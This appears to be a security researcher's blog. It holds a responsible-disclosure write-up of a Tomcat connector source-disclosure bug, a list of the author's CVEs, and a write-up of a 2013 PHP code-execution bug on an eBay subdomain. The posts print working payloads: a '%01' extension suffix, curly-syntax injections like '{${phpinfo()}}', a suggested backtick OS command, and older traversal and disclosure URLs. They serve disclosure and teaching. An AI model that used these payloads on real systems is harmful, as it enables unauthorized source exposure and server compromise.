1) The Apache Tomcat Connectors: If Apache httpd and Tomcat are configured to serve content from the same filing system location then care must be taken to ensure that httpd is not able to serve inappropriate content such as the contents of the WEB-INF directory or JSP source code. This could occur if the httpd DocumentRoot overlaps with a Tomcat Host's appBase or the docBase of any Context. It could also occur when using the httpd Alias directive with a Tomcat Host's appBase or the docBase of any Context.

2) Well, let's have a look on the Apache web server handler. A "handler" is an internal Apache representation of the action to be performed when a file is called. Generally, files have implicit handlers, based on the file type. Normally, all files are simply served by the server, but certain file types are "handled" separately. If you want to handle ".jsp" files you may for example use the Apache module "mod_mime" in order to associate the requested filename's extensions with the file's behavior (handlers and filters) and content (mime-type, language, character set and encoding).

What will the httpd do if you try to access file which is not explicitly associated with a handler or filter? Httpd will serve the file as plain text without further actions which means that we can potentially exploit this behaviour.

Analysis

In the case of my research of this particular target system i knew from the information gathering analysis that they were handling ".jsp" files, so i assumed that they are using an Apache httpd in the front and an Tomcat or similar web server in the back end of the architecture. So i tried to append some character to the file extension like this in order to get some information by forcing the system to run in some uncaught exceptions and show up with any anormally behaviour:
https://www.victim.tld/password.jsp%00
This, however did not work as expected. I was expecting the system to expose a stack trace or to run into a web application firewall, but instead if came it up with the following message:
HTTP ERROR: 400
Problem accessing /password.jsp%00. Reason:
    The request contains an illegal URL
From several pentests I performed in the past i knew that the apache httpd would usually strip the %00 and raise a message like this one:
Not Found
The requested URL /password.jsp was not found on this server.
Therefore I assumed that the error message is not originated by the httpd but from a connector. From past pentests I know that there were some connectors which led to unusual behaviour when passing lower ascii characters to them.

During my research related to Tomcat connectors I found that i may manipulate the routing of the data stream by using the SOH (start of header, 0x01) transmission control sequence. The start of heading (SOH) character was to mark a non-data section of a data stream which is the part of a stream containing addresses and other housekeeping data.

As i have been successful with this trick in past with several modules such as mod_proxy_ajp, mod_jk, some spring boot implementations and a few other i tried:
https://www.victim.tld/password.jsp%01

What I assumed

In this case I assumed the target system had following implementation in place:
1) Send request to Apache httpd
2) httpd uses it's file handler/filter to pass the request to Tomcat for processing
3) Tomcat uses it's file handler to open the".jsp" file because it handles
the %01 as the start of a new header and not as part of the file extension
4) Tomcat passes the content of the requested file to the httpd
which now has the content of the ".jsp" file with the requested extension ".jsp%01".
5) httpd does not find the ".jsp%01" extension in it's file
handler's extension list and therefore decides to serve the file as plain text
6) The same also works for ".inc" files on the target system

PoC and reporting

I would potentially gain access to the whole source code but decided to access a few ".jsp" and ".inc" files as a proof of concept. I then immediatly reported this issue to the company and within 3 hours they gave me feedback that they verified the issue and triaged it with the highest severity. They then deployed a hotfix within 48 hours. Respect!

References

http://httpd.apache.org/docs/current/handler.html
http://httpd.apache.org/docs/current/mod/mod_mime.html
https://tomcat.apache.org/connectors-doc/reference/apache.html
Web server handler/filter/modules with similar issues in the past:
CVE-2007-1860: mod_jk double-decoding:
http://www.cvedetails.com/cve/CVE-2007-1860/

WebLogic: http://www.example.com/index.js%70
(via: http://www.securityfocus.com/bid/2527/exploit)

Tomcat: http://www.example.com/examples/snp/snoop%252ejsp
(via:http://www.securityfocus.com/bid/2527/exploit)

IBM Websphere: http://www.example.com/login.JsP
(via: http://www.securityfocus.com/bid/1328/info)

Netscape Web Server: http://www.example.com/login.jsp%20
(via: http://www.securityfocus.com/bid/273/discuss)

Allaire JRun Root directory disclosure:
http://server/%3f.jsp
(via: http://www.securityfocus.com/bid/3592/discuss)

Apache httpd artificially Long Slash Path Directory Listing Vulnerability:
http://www.example.com///[1-4096 slashes here]/admin/*
(via: http://www.securityfocus.com/bid/2503/discuss)

BEA WebLogic Directory Traversal with %00, %2e, %2f and %5c:
http://www.example.com/%5cadmin/
(via:http://www.securityfocus.com/bid/2513/discuss)

My advisories and CVEs

Mar, 15th 2017

Intro

Some of you reached out to me and asked me for my CVEs. Here is a list of some of my security advisories and associated CVE numbers sorted by vulnerability type.

CVE-2016-4977 Remote Code Execution
                     CVE-2016-3109                                          Remote Code Execution                    
CVE-2011-0635 Remote Code Execution
                     CVE-2006-7055                                    Remote Code Execution                 
CVE-2006-5132 Remote Code Execution
                     CVE-2006-3793                                    Remote Code Execution                 
CVE-2006-3210 Remote Code Execution
                     CVE-2006-2881                                    Remote Code Execution                 
CVE-2006-2852 Remote Code Execution
                     CVE-2006-2681                                    Remote Code Execution                 
CVE-2006-2323 Remote Code Execution
CVE-2010-2339 SQL Injection
CVE-2008-6120 SQL Injection
CVE-2006-3770 SQL Injection
CVE-2006-5128 SQL Injection
CVE-2006-5132 SQL Injectionn
CVE-2006-3793 SQL Injection
CVE-2006-3210 SQL Injection
CVE-2006-5935 SQL Injection
CVE-2006-5798 SQL Injection
CVE-2006-7077 SQL Injection

ebay.com: RCE using CCS

Dec, 13th 2013

Intro

Once again i have been hunting security issues on ebay's web sites. This time I've identified a controller which was prone to remote code execution due to a type cast issue in combination with complex curly syntax. Since this techniques are less known and less discussed I found it interesting enough to blog about it. The vulnerable sub domain id the same where I've identified an exploitable SQL injection last year, which is located on http://sea.ebay.com .

Information gathering

A legit user request looked like:
https://sea.ebay.com/search/?q=Dave&catidd=1

One of the very first tests I perform against php web applications is to look for type cast issues because php is known to raise warnings or even errors when the value of a given param is an array rather than being a string which it is expected to be. So obviously my next step was to perform the above request using [] to submit it as an array:

https://sea.ebay.com/search/?q[]=Dave&catidd=1

The web application served me the same response as in the prior request which surprised me a bit. From my experience I know that php has several ways to handle strings. For example if the string is enclosed in double-quotes, the php parser will allow code evaluation if some circumstances are given.

PHP complex syntax

Well, if we use php's complex curly syntax we could possibly have some success. Never heard of complex syntax?


Let's give it a try:
https://sea.ebay.com/search/?q={${phpinfo()}}&catidd=1

PHP code evaluation circumstances

This had no success. So let's rethink which circumstances may lead to code evaluation in php.

Which of these is ebay using?

Since it's been a blackbox test I assumed that eBay was using preg_replace() for filtering bad words in combination with the eval() method afterwords because of 2 observations i made:
1) they were using a spellchecker. I have seen a bunch of spellchecker in web apps working with eval() method in the past
2) they are using some filter which I guess to be a blacklist of words that are being replaced with the preg_replace() method.

Blackbox analysis

For example when I submitted my handle 'secalert' it was stripped and as a result it returned 'sec' in the response of the search query. So obviously they are filtering words like 'alert' from the user supplied string, maybe in hope to prevent XSS, which is a very bad idea! It didn't work. Okay, seems like they are not using user-supplied values within double-quotes. So what can we do now?

PHP's internal string handling

How does php internally handle strings?

PHP complex syntax + http parameter pollution + array indexing

So let's try to submit an array rather than a string and try to echo the values of the param 'q' by accessing the array indices.
https://sea.ebay.com/search/?q[0]=Dave&q[1]=secalert&catidd=1

It works. The search controller parsed that request and I got the last instance as part of the result, in this particular case it returned valid entries which matched to the keyword 'sec'.

My assumption

But why? As mentioned prior I was assuming that eBay is using preg_replace() for filtering bad words and afterwards doing some eval() stuff with that return values. So what happens here could be that they are trying to enforce that user supplied values are always of the type string. That means if it's not a string they try to make a string out of it, i.e. they try to cast the values of the array into a string before doing the string comparison for the list containing bad words.

Exploiting the RCE

Okay, good. But how can we exploit that? We will put all this stuff together and submit an array with 2 indices containing arbitrary values, one of them will be supplied in complex curly syntax to trick the parser.
https://sea.ebay.com/search/?q[0]=Dave&q[1]=secalert{${phpinfo()}}&catidd=1
Success! Now let's verify this by submitting two more requests.
https://sea.ebay.com/search/?q[0]=Dave&q[1]=secalert{${phpcredits()}}&catidd=1
https://sea.ebay.com/search/?q[0]=Dave&q[1]=secalert{${ini_get_all()}}&catidd=1

Verified! We can evaluate arbitrary php code in context of the ebay website.

From my point of view that was enough to prove the existence of this vulnerabilty to ebay security team and I don't wanted to cause any harm. What could an evil hacker have done? He could for example investigate further and also try things like {${`ls -al`}} or other OS commands and would have managed to compromise the whole webserver.

References

http://www.php.net/manual/en/language.types.string.php
http://www.suspekt.org/downloads/DPC_PHP_Security_Crash_Course_06_IncludeAndEval.pdf

Timeline

December,  6th 2013: vulnerability discovered and reported to ebay
December,  9th 2013: ebay solved the issue and deployed a hotfix
December, 13th 2013: this write-up has been published

IMPRESSUM

Impressum:
David Vieira-Kurz
Kemmannweg 26b
13583 Berlin
David.kurz@majorsecurity.com

Datenschutz/Nutzungshinweise:

Automatisierte Datenerhebung: Bereits beim bloßen Besuch dieses Blogs übermittelt Ihr Internetbrowser bzw. Ihr Mobilgerät aus technischen Gründen regelmäßig automatisch nicht-personenbezogene Daten, die wir in einer Protokolldatei speichern. Dazu gehören:

  • - Browsertyp/ -version bzw. Typ und Version des Mobilgeräts
  • - verwendetes Betriebssystem
  • - Referrer URL (die zuvor besuchte Seite)
  • - öffentliche IP-Adresse des zugreifenden Rechners
  • - übertragene Datenmenge
  • - Inhalt der Anforderung (konkrete Seite)
  • - Zugriffsstatus/HTTP-Statuscode
  • - Uhrzeit der Serveranfrage
  • - ggf. Version der App
  • Diese Daten werden ausschließlich zu statistischen Zwecken sowie zur Verbesserung des Angebotes für den Nutzer des Blogs erhoben. Eine Verknüpfung dieser Daten mit Daten, die Sie persönlich identifizierbar machen, erfolgt nicht, es sei denn, dies ist zu Beweiszwecken zwingend erforderlich.
    DIese Webseite setzt Cookies. Darueber hinaus werden 3rd PArty Cookies von Youtube gesetzt. Betreibergesellschaft von YouTube ist die YouTube, LLC, 901 Cherry Ave., San Bruno, CA 94066, USA. Die YouTube, LLC ist einer Tochtergesellschaft der Google Inc., 1600 Amphitheatre Pkwy, Mountain View, CA 94043-1351, USA. Weitere Informationen zu YouTube können unter https://www.youtube.com/yt/about/de/ abgerufen werden. Die von YouTube veröffentlichten Datenschutzbestimmungen, die unter https://www.google.de/intl/de/policies/privacy abrufbar sind, geben Aufschluss über die Erhebung, Verarbeitung und Nutzung personenbezogener Daten durch YouTube und Google.